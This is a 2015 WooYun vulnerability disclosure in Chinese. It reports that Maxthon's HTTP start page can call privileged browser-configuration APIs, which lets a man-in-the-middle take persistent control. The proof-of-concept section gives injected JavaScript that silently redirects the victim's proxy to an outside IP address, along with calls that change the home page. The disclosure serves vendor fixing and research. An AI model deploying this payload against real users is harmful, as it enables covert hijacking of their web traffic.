当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091807

漏洞标题:傲游云浏览器可被中间人攻击二

相关厂商:傲游

漏洞作者: MITM

提交时间:2015-01-19 11:16

修复时间:2015-04-20 14:22

公开时间:2015-04-20 14:22

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-19: 细节已通知厂商并且等待厂商处理中
2015-01-19: 厂商已经确认,细节仅向厂商公开
2015-01-22: 细节向第三方安全合作伙伴开放
2015-03-15: 细节向核心白帽子及相关领域专家公开
2015-03-25: 细节向普通白帽子公开
2015-04-04: 细节向实习白帽子公开
2015-04-20: 细节向公众公开

简要描述:

昨天提报完《傲游云浏览器可被中间人攻击》之后,发现另一个不同思路,仍可攻击傲游浏览器。

详细说明:

《傲游云浏览器可被中间人攻击》是绕过TLS证书校验来攻击HTTPS网站cookie。这个报告不攻击HTTPS,而是讨论如何持久地中间人攻击。首先感谢心伤的胖子的报告《傲游云浏览器漏洞造成可以远程控制浏览器》(WooYun-2013-33365)提供了本文的思路。
WooYun-2013-33365提到maxthon.cn域有权限操作maxthon对象,并可以通过maxthon对象来修改浏览器设置。经测试,直到2015年的今天,依然是这样:

0.png


而对于中间人来讲,只要不用HTTPS,就能任意篡改页面内容。我们都无需找maxthon.cn下的XSS漏洞。傲游的默认首页是http://i.maxthon.cn/。中间人可以在这页上插入脚本,调用maxthon对象。
那么我们可以利用maxthon对象做什么事情呢?经测试,
1)修改主页仍可行:maxthon.browser.config.ConfigManager.set("maxthon.config","browser.general.startpage","http://www.baidu.com/");
2)修改代理服务器设置也可行:maxthon.browser.config.ConfigManager.set("maxthon.config", "browser.general.proxy_config_type", "[]");
修改代理服务器设置就可以达到我说的“持续攻击HTTP”的目的,因为我可以将代理的地址指向我控制的服务器,这样用户的所有流量都会主动发到我的服务器。虽然我破不了HTTPS,但鉴于目前国内使用HTTPS非常不普及,能监听HTTP也可以了。我修改完代理服务器之后,它就相当于新的中间人。我可以通过配置代理服务器的规则达到篡改任意HTTP网页、任意你的修改浏览器设置、更新代理服务器地址,以及想撤出时,删除代理服务器设置。而且除了你上网速度可能会受影响之外(受多大影响取决于我的服务器的位置,我要是有缓存,你可能还觉得快了),没有其他异常,整个过程无用户交互。

漏洞证明:

我在Fiddler上模拟了一下。过程是:
1、跳转任意HTTP页(http://www.example.com)到http://i.maxthon.cn/#http://www.example.com
2、对http://i.maxthon.cn/请求,直接返回如下代码:

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta charset="utf-8" />
<title></title>
<script>
maxthon.browser.config.ConfigManager.set("maxthon.config", "browser.general.proxy_config_type", '{"bypass_local":"0","use_white_list":"0","white_list":"","bypass_list":"","proxy":[{"host":"69.50.225.155","id":"3","name":"傲游加速服务","password":"","port":"80","scheme":"HTTP","username":""}]}')
location.href = location.hash.substring(1);
</script>
</head>
<body>
</body>
</html>


3、完成

1.png


2.png

修复方案:

1、禁止HTTP域的任何页面调maxthon.browser.config
2、HTTP协议下的特权域应该强制HTTPS

版权声明:转载请注明来源 MITM@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-01-19 14:46

厂商回复:

需要先劫持 才能进行攻击. 危害相对小点

最新状态:

暂无


漏洞评价:

评论